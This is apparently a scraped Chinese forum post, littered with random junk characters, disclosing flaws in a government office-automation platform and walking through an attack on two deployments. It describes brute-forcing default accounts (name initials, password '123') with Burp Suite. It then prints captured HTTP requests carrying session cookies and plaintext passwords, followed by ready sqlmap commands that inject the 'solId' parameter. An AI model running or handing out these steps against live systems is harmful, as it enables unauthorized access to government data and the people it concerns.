|
9 e: m& C* O. x$ r3 {& _' j 5 i" P2 O/ L8 ^6 u
! ?( B& V7 F3 }+ @( O
( T$ D* o) |( D5 W( k8 R 平台简介:- l* h2 m% X* U1 j7 n# h8 e
+ S3 b" S% S) Q- a, h' g2 ]
/ K/ [. j8 f, }( e* Y : l% Z, t; {6 A
# V! |8 ]( c# l8 _4 R
' g& ^+ v8 F0 b# E
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* S/ _; E/ ]# O: x4 z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 * b) {3 [' l" N x0 ^+ B
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 r9 s: X" x4 M8 I8 o- J& i, G
. |/ |; |4 W/ w6 F' Q
3 S( n( V- r* c# g" x
/ r1 e" d6 b% }1 ]4 j9 w
; ^, }5 A) p w, q: T7 v. ^0 F% `2 S
$ p4 t5 @; R+ r, j1 \9 M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 _9 X) f* P' B4 H6 g3 z* R
) d% t* ]3 h* ^7 e
# ~! V1 }( r( c0 C4 H" K4 N; P- |8 w 8 o! Z/ {0 R# T' G
9 A& `6 V7 f( A B7 K1 a% _
2 y/ F8 v! K# l; E" l http://1.1.1.1:7197/cap-aco/#(案例2-)4 R) Y, ?5 E- T) n- Z
4 v2 D: j9 v2 A' l9 Y2 b
! F# V, a A% ~( d http://www.XXOO.com (案例1-官网网站)
$ s2 [4 |, l' s; n2 l
! Q0 M& I0 Z" t( x# e" L+ x- f6 D% z+ G/ d
; ], Z0 k V4 d, [' B& w3 }. s' u
5 x, F; E! `+ R$ t/ \$ j3 z3 s
/ E. C6 q) m& V4 P: K3 h: s 漏洞详情:
& t% F8 a& B5 O3 a4 [) z6 [' r
# t# ~$ @' L/ I/ F5 N$ `+ F1 r" N/ o3 G Y4 _
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试; A" \7 n* x& F2 l: Y
( t( _; Q% B' q
$ r( V- ^2 S/ s, ~) `
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
- \" C3 j3 E" N+ X
+ A. ?% m! |0 S; N! ~" |( ?3 M) q% v7 K2 F* J9 _8 m
' K: ], r2 c" z
5 c) x/ ?/ u/ y, W8 A% u' ]5 k/ z! W
3 \. ~; `( B: {: E" _
/ y. {6 q/ l- i0 T. w0 n
) c9 b, }* S8 \" s) |9 h' T4 C) d3 R$ a M/ i) e# v# s
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
. n& n/ b. [1 T- i1 U: A2 P 1 S2 ?/ A+ s3 }- T# x/ K, S
2 B* Z0 z; ~7 d3 H& y
1、案例1-官方网站
3 d% C6 ^+ m# n: E; d7 f
' o1 n3 k6 o( G1 Z" m- i O/ v e; q7 H: Q
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 x2 K! `8 g! _
5 ?* |" b+ |6 b8 a' x# v) T$ D& @- N, P* A
Host: www.XXOO.com$ f6 i* N, T/ ^3 a
( l `: h9 _! ^4 |: |7 d8 ?% p$ r* v# g
Proxy-Connection: Keep-Alive
/ Y$ w5 ?+ j9 t( H1 O! n/ _ : z1 T( c4 v* R! N: q
* ]1 g U2 I' P- O w Accept: application/json, text/javascript, */*; q=0.011 q) O3 C7 v# ^
# h6 N. X; @9 Q8 F
! r% E3 w2 Q9 p9 r" R Accept-Language: zh-CN
, P9 i$ C) F; B4 c9 X- c- L) h ; d$ D8 S- q1 }: L6 B/ k* O! m
6 p5 k$ t! T% x7 @. [- o& I
Content-Type: application/json
6 x5 K5 r, y N8 C$ a# F* g2 |$ h
; B/ Q4 r& j) b% V& h
( [& N) h2 T5 U% W& ~$ _! ~2 q User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
. u/ x9 [; m( I5 T m u6 n + F5 x! c Z6 M! f& s6 u1 z
" u9 o4 T+ j% I& r6 i1 r
X-Requested-With: XMLHttpRequest' N. k7 t: e$ n# u9 j& Q
/ E8 }, Z( t) p9 ~1 i
C( T1 C5 }; U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0024 {4 r s5 l5 V
) V- j: ^% b* `3 e
6 v9 [3 S X3 z _3 \" A2 L Accept-Encoding: gzip, deflate, sdch; S: k- J; o) [, g+ G2 o
! v7 V& [: u9 h% o, I
( i2 Z! U' s S/ \( N3 c4 ~
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e( e* d. k' m0 _% h1 @0 E& J. k1 V! w
6 Z( k, J4 j7 {; h0 n, _- ]( `$ s' w/ V% ~: {
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:4 C. n0 j# r! q% H3 \ W5 {* n
2 j4 B5 ~1 l6 P
# f& N- C7 ^ V: R! K r ( d/ P+ N U" O7 o$ y
6 N5 `( Z, {; K, y
$ T: J6 v+ Y) E; v, u5 Z- g
3 o w X8 r- N
* r! b- ?/ X& |' g9 \* S
1 c) y7 W3 Q: _8 b
4 N4 s/ }) ]& S7 i. L+ U; d
3 s2 x) M3 E6 G, q# ~ X( q6 ] `5 k1 J+ M2 h/ M
& p. Y2 j6 N: H4 _! m+ y
# Y* Y! _- p5 {
' |# p& j! n5 x3 Y& P7 t
/ Y0 H3 E6 c% _: L" m 1 g- b" b0 k4 z
7 D2 s8 }& r! A5 m- q5 b. c 2、案例2-某天河云平台
4 {4 U& Y6 G( x6 j$ Q/ W, P $ J/ S9 ^. [5 ?- c# W- \
1 @7 H1 S! S! t2 r3 w GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1/ n! i5 |5 |# ]2 z( v7 a5 h- X
0 } u6 R; s+ M2 z- Q: C% a! Q
/ i. P+ n6 L4 [. \
Host: 1.1.1.:7197
1 c/ ?' f5 ]7 G4 Z# r$ }) H! s ) d1 O* b0 a. w6 ` H: F
. K" K( U' n6 r3 w8 b3 }9 n X
Accept: application/json, text/javascript, */*; q=0.01
# ?% p: u& n3 u6 [4 r
0 W) [/ f$ D9 H8 C
! C3 w+ t" t8 [; H X-Requested-With: XMLHttpRequest
" a/ j5 d+ x, Y' k8 y5 n & c4 J2 G+ C; T* Y: w1 W. f8 i
) }& m# t" Y: o; E User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
: g+ G# S/ ~# Y) E% {3 t8 A8 ]( i
0 T; D, r4 }! |* z* n8 ]" d( L& N) h! S( o! N8 B
Content-Type: application/json: f" X5 O a# s* F( Y0 A9 z
7 u! a% k- O! t* n3 [/ A1 U
8 M0 P3 b, r9 b( E8 ~
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
( [, q4 ]: G: k( t, r 3 ]- p6 X# J# ?5 z
( L( F* }8 a! s3 i Accept-Language: zh-CN,zh;q=0.8- ^ D/ \- W$ V2 h5 |6 r7 }+ ]0 H
2 S) w4 a9 V0 t( a0 s
: Z9 B! F1 q. g! N& J Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
" V) J) G+ o. Z/ g$ ?
2 Z# t6 J4 ~, _; L6 I1 ?6 O0 |! D: V4 X: O$ R5 P( s
Connection: close
& S8 J7 Q0 ^% d1 e+ \ 8 C4 }1 q9 e2 c3 \
- h. [) ^; N+ I) K& x 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:7 L1 b* @; E4 f8 S
+ j m5 K' o) K5 R$ }& A
' M; i7 l" ~: E/ D ( K, H8 O- s) ]$ n' ?
( w* [1 ?1 K' f) Z f; Y
, Z) I* @- {& N/ M) |; P& m& d! Y
( I1 m! V$ s2 C% l0 h7 W |